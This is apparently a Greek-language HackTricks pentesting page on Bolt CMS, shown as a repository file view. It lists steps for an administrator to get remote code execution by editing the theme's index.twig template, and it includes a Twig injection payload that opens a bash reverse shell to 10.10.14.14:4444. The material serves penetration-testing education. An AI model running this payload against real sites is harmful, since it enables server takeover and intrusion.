hacktricks/network-services-pentesting/pentesting-web/bolt-cms.md
Translator workflow 35c6b081d2 Translated to Greek
2024-02-10 22:40:18 +00:00

4.8 KiB
Raw Blame History

Bolt CMS

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι υποστήριξης του HackTricks:

RCE

Αφού συνδεθείτε ως διαχειριστής (πηγαίνετε στο /bot για να αποκτήσετε πρόσβαση στην οθόνη σύνδεσης), μπορείτε να αποκτήσετε RCE στο Bolt CMS:

  • Επιλέξτε Ρύθμιση -> Προβολή ρυθμίσεων -> Κύρια ρύθμιση ή πηγαίνετε στη διαδρομή URL /bolt/file-edit/config?file=/bolt/config.yaml
  • Ελέγξτε την τιμή του θέματος
  • Επιλέξτε Διαχείριση αρχείων -> Προβολή και επεξεργασία προτύπων
  • Επιλέξτε τη βάση θέματος που βρήκατε στο προηγούμενο βήμα (base-2021 σε αυτήν την περίπτωση) και επιλέξτε το index.twig
  • Στην περίπτωσή μου, αυτό βρίσκεται στη διαδρομή URL /bolt/file-edit/themes?file=/base-2021/index.twig
  • Ορίστε το payload σας σε αυτό το αρχείο μέσω ενσωμάτωσης προτύπων (Twig), όπως: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
  • Και αποθηκεύστε τις αλλαγές
  • Απαλείψτε την προσωρινή μνήμη στο Συντήρηση -> Απαλοιφή προσωρινής μνήμης
  • Προσπελάστε ξανά τη σελίδα ως κανονικός χρήστης και το payload θα πρέπει να εκτελεστεί
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι υποστήριξης του HackTricks: